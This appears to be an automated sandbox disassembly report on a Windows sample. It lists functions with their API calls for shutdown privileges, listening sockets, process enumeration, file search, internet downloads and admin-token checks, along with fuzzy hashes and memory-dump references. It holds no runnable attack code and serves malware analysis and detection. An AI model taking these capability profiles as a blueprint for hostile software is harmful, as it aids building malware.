API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: a0e8c17cfd304fe1a31d750455e3bda0896c25773b20db19a73075f5c1c31089
Instruction ID: 2115fd6e7b618d274b8e3fea5a9f090f4daf6fd76c928cc85f36b80ba9c46f2b
Opcode Fuzzy Hash: a0e8c17cfd304fe1a31d750455e3bda0896c25773b20db19a73075f5c1c31089
Instruction Fuzzy Hash: EB216B31300610AFDB11AFA4ED49B6D77B8EF44721F04801AFA0ADB2A1DF34E9428B94

Function 00A6C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00A49ABF: CLSIDFromProgID.OLE32 ref: 00A49ADC
Part of subcall function 00A49ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00A49AF7
Part of subcall function 00A49ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00A49B05
Part of subcall function 00A49ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00A49B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00A6C235
_memset.LIBCMT ref: 00A6C242
_memset.LIBCMT ref: 00A6C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00A6C38C
CoTaskMemFree.OLE32(?), ref: 00A6C397

Strings

NULL Pointer assignment, xrefs: 00A6C3E5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 997d8236f8561ebd23c75d5cbd4c86a0dc9555d4039a9a8e322a60eff443c8e5
Instruction ID: 198176b6a11489a01be0ede0cdb2d4275c9eeb31c5d6e1b435d20dcd0f5608fc
Opcode Fuzzy Hash: 997d8236f8561ebd23c75d5cbd4c86a0dc9555d4039a9a8e322a60eff443c8e5
Instruction Fuzzy Hash: CE913B71D00218EBDB10DFA4DD95EEEBBB8EF08720F10815AF515AB281DB709A45CFA0

Function 00A579D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00A4B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A4B180
Part of subcall function 00A4B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A4B1AD
Part of subcall function 00A4B134: GetLastError.KERNEL32 ref: 00A4B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00A57A0F

Strings

@, xrefs: 00A57A02
, xrefs: 00A579FD
SeShutdownPrivilege, xrefs: 00A579DD

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 1134d49dffc50474f5b5302fab0f08cb4bb85c5774485757672e24b52cefa3f8
Instruction ID: e086787458766c91aeb9e85e30790ec75d2eab855431c20c0c64f5efa843c38b
Opcode Fuzzy Hash: 1134d49dffc50474f5b5302fab0f08cb4bb85c5774485757672e24b52cefa3f8
Instruction Fuzzy Hash: 4501AC757582216AF7285778BC5ABBF7268B7007C2F140915BF43B20D2DA705E0981B0

Function 00A68C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A68CA8
WSAGetLastError.WSOCK32(00000000), ref: 00A68CB7
bind.WSOCK32(00000000,?,00000010), ref: 00A68CD3
listen.WSOCK32(00000000,00000005), ref: 00A68CE2
WSAGetLastError.WSOCK32(00000000), ref: 00A68CFC
closesocket.WSOCK32(00000000,00000000), ref: 00A68D10

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 0596343f29cc58c8134ec2f1ce15da832bebc98bac1f54a86efa29039b58d342
Instruction ID: 24fc6296c8be1183004e31ec76e278992048f04848d30b80a7d5d209c582caf2
Opcode Fuzzy Hash: 0596343f29cc58c8134ec2f1ce15da832bebc98bac1f54a86efa29039b58d342
Instruction Fuzzy Hash: C821B4316002109FCB10EFA8D985B6E77F9EF48724F108259F956A72D2CB34AD42CB61

Function 00A56532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00A56554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00A56564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00A56583
__wsplitpath.LIBCMT ref: 00A565A7
_wcscat.LIBCMT ref: 00A565BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A565F9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 1fad5660e47d51b803d28112f6da08d94b30a1bc5de0347336aeeae92cd4ecc9
Instruction ID: 4ae5300d43fb1ea559f1e5c4939c44706d908400d99cb7b932699f1990786963
Opcode Fuzzy Hash: 1fad5660e47d51b803d28112f6da08d94b30a1bc5de0347336aeeae92cd4ecc9
Instruction Fuzzy Hash: 272145B1900219ABDB10EBA4DD89FDEB7BCBB49301F5004A6F905E7141EB759F89CB60

Function 00A6923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00A6A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00A69296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 00A692B9

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 89a436102f7e7f6d06e733331c300282a53a423f3a642c9539cb5ab4aa730488
Instruction ID: a50865b17e18c206532c0711148eed01fbb8e1d327002e95e755fdeeded5fab4
Opcode Fuzzy Hash: 89a436102f7e7f6d06e733331c300282a53a423f3a642c9539cb5ab4aa730488
Instruction Fuzzy Hash: 6D41D270600210AFDB10AB68CA92EBF77FDEF44724F04855CF956AB3D2DA749D418B91

Function 00A5EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A5EB8A
_wcscmp.LIBCMT ref: 00A5EBBA
_wcscmp.LIBCMT ref: 00A5EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 00A5EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00A5EC0E

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 5cc2e7d71c4e30279995ca3b9afa82a5300700a8341cc262e5d91ef95b8f9e3f
Instruction ID: a590a55bcc761b0897f43fecadca2fe2e05bb5053119a980f9bdaf8ca031df43
Opcode Fuzzy Hash: 5cc2e7d71c4e30279995ca3b9afa82a5300700a8341cc262e5d91ef95b8f9e3f
Instruction Fuzzy Hash: 3441BD356003029FCB08DF68C491A9AB3E4FF49324F10856EF95A8B3A1DB31EA45CB91

Function 00A78111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A78160
IsWindowEnabled.USER32 ref: 00A7816E
GetForegroundWindow.USER32(?,?,00000001), ref: 00A7817B
IsIconic.USER32 ref: 00A78189
IsZoomed.USER32 ref: 00A78197

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: aeb03257bc1682daf8fb33f8b3d9e0d22fd6c71f7a32b2beec91e4696bedbf94
Instruction ID: 0afa6c81412a350425042cc2842fc6e8090bf1a49d96304062fadeaabc01bc31
Opcode Fuzzy Hash: aeb03257bc1682daf8fb33f8b3d9e0d22fd6c71f7a32b2beec91e4696bedbf94
Instruction Fuzzy Hash: 3C119D313402106BE721AF66DC88B6FBBACEF54760B44852AF94DD7241CF38E94386A4

Function 00A19B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00A19ED4
ERCP, xrefs: 00A19C32
VUUU, xrefs: 00A19E95
VUUU, xrefs: 00A9BE14
VUUU, xrefs: 00A19EA7

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 59313fc4c6693492afb831cdc22f9341bb1d9b7b89decc1dafdec91e323b3836
Instruction ID: 0d2c63a8bb4f6c6f8ddc1d5e29508683acbcaea88386137f869f6b3667732554
Opcode Fuzzy Hash: 59313fc4c6693492afb831cdc22f9341bb1d9b7b89decc1dafdec91e323b3836
Instruction Fuzzy Hash: B6928E75E0162ACBDF24CF58C9907EEB7B1BB54314F24829AE816AB280D7719DC1CF91

Function 00A2E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A2E014,75570AE0,00A2DEF1,00AADC38,?,?), ref: 00A2E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A2E03E

Strings

GetNativeSystemInfo, xrefs: 00A2E038
kernel32.dll, xrefs: 00A2E027

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 2b4e348408a8ccaabfe54877749cde654c23e429d9dcebd21e18cb6a3c573a00
Instruction ID: e25dfffc3343f18f31d53e3d558dc8940471718fd612ce8d99dde16cbc4a2d77
Opcode Fuzzy Hash: 2b4e348408a8ccaabfe54877749cde654c23e429d9dcebd21e18cb6a3c573a00
Instruction Fuzzy Hash: 19D0C771544722AFD731DFA5FD08B527AE4BB04711F29492EE895E2150DFF4D8C28750

Function 00A513CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A513DC

Strings

(, xrefs: 00A51422
|, xrefs: 00A5140C

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 83ab70865ba4a2284a7129561907f0ee6c4e62d4095f1aa06e6fb0ff7f5331b9
Instruction ID: 5926dcd905a2284ba5d08153b57461d8eb48ca017b855010def1bc17b510cfaa
Opcode Fuzzy Hash: 83ab70865ba4a2284a7129561907f0ee6c4e62d4095f1aa06e6fb0ff7f5331b9
Instruction Fuzzy Hash: 3D3215B5A006059FCB28DF69D480A6AB7F0FF48310B15C56EE99ADB3A1E770E941CB44

Function 00A2B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 00A2B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A2B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 00A2B22F

Part of subcall function 00A2B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A2B5A5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: aeee83848eb35258c095af2b638ef39a2bcd15ee3212addb63ade5e889e600f5
Instruction ID: 8805473b0faa9167c0920bcfdba96ebc35776a6e1db0f3a2a8689529c2d310cf
Opcode Fuzzy Hash: aeee83848eb35258c095af2b638ef39a2bcd15ee3212addb63ade5e889e600f5
Instruction Fuzzy Hash: D5A11370124225FBDB28FB6D6D88EFF2B7CEB46350B10813AF846D6592DB259D019372

Function 00A64EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A643BF,00000000), ref: 00A64FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A64FD2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 47f8b03cb7f99e179f14dde2e6de2349785c83759053ea27dbf4a6b5023de9e3
Instruction ID: 9bf61e19fb920195d34813ff897f8b16cc7fef0439f21a8f814ff7d8bf2c982c
Opcode Fuzzy Hash: 47f8b03cb7f99e179f14dde2e6de2349785c83759053ea27dbf4a6b5023de9e3
Instruction Fuzzy Hash: 0741F671A04209BFEB20DF94DD81EBFB7BCEB44B54F10402EF205A6181EA719E4197A0

Function 00A5E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A5E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A5E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A5E2B4

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: fac3f4a2baeb59f51a2a2a14c4c6004a0227ffb232565601ccb9c46c32ac940d
Instruction ID: 97403fac1e60ff01b598d3654ad0c01df67c8067137738d7a66586117b6ce230
Opcode Fuzzy Hash: fac3f4a2baeb59f51a2a2a14c4c6004a0227ffb232565601ccb9c46c32ac940d
Instruction Fuzzy Hash: 39216D35A00218EFCB00EFA5D984EEDBBB8FF48310F1484AAE905EB255DB319946CB54

Function 00A4B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A2F4EA: std::exception::exception.LIBCMT ref: 00A2F51E
Part of subcall function 00A2F4EA: __CxxThrowException@8.LIBCMT ref: 00A2F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A4B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A4B1AD
GetLastError.KERNEL32 ref: 00A4B1BA

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 10552453d57cbe40c3c5eabd963c49035bf7084acb1d041a77cb8a322cb1be00
Instruction ID: d657f64ffab20fb8773fd27de0acd1c29c480d2e9381c4cb1a94c4c7f5865a7a
Opcode Fuzzy Hash: 10552453d57cbe40c3c5eabd963c49035bf7084acb1d041a77cb8a322cb1be00
Instruction Fuzzy Hash: 901191B1514205AFE718EF58EDC5D2BB7BDFB44710B20853EE45697240DBB0FC418A60

Function 00A56685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A566AF
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00A566EC
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A566F5

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 13031c0451ad5d6504518779d7ac011b549ad1e60796408ee14ff74dc5a5438e
Instruction ID: a68f06196e4777a1b1179250d29510db0b8c9e6e2f2545c43a3e116b5d8c1691
Opcode Fuzzy Hash: 13031c0451ad5d6504518779d7ac011b549ad1e60796408ee14ff74dc5a5438e
Instruction Fuzzy Hash: BB11A5B1A01228BEE710CBE8DC45FAFBBBCEB08714F104656FD01E7190D2749E458BA5

Function 00A571FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A57223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A5723A
FreeSid.ADVAPI32(?), ref: 00A5724A

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ab7fc8f5cbcb69a3d116c2b5460ca7a3659d1e9bbd07842d8bae6047d9db356b
Instruction ID: d61f7246d123e3ddfb22d6a8fa1e2cc9dcebe69a3f61eb120d5134053b073ade
Opcode Fuzzy Hash: ab7fc8f5cbcb69a3d116c2b5460ca7a3659d1e9bbd07842d8bae6047d9db356b
Instruction Fuzzy Hash: 9DF01D76A04209BFDF04DFE4DD89AEEBBB8FF08205F50456AA602E3191E6709A458B10

Function 00A23B70 Relevance: 3.4, Strings: 2, Instructions: 903COMMON

Download Yara Rule

Strings

`7, xrefs: 00A240A4, 00A240EC
@, xrefs: 00A24176

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$`7
API String ID: 3728558374-3316101289
Opcode ID: 4dc1eeefcc3c0f8aa1f3c1308f9b712973196b87f4334f3ae13e24e9aa12cb52
Instruction ID: fa2f31168e42fe244b2286f20aca959aafe72b17cdbc6ac2aee63ca3ec1e86b2
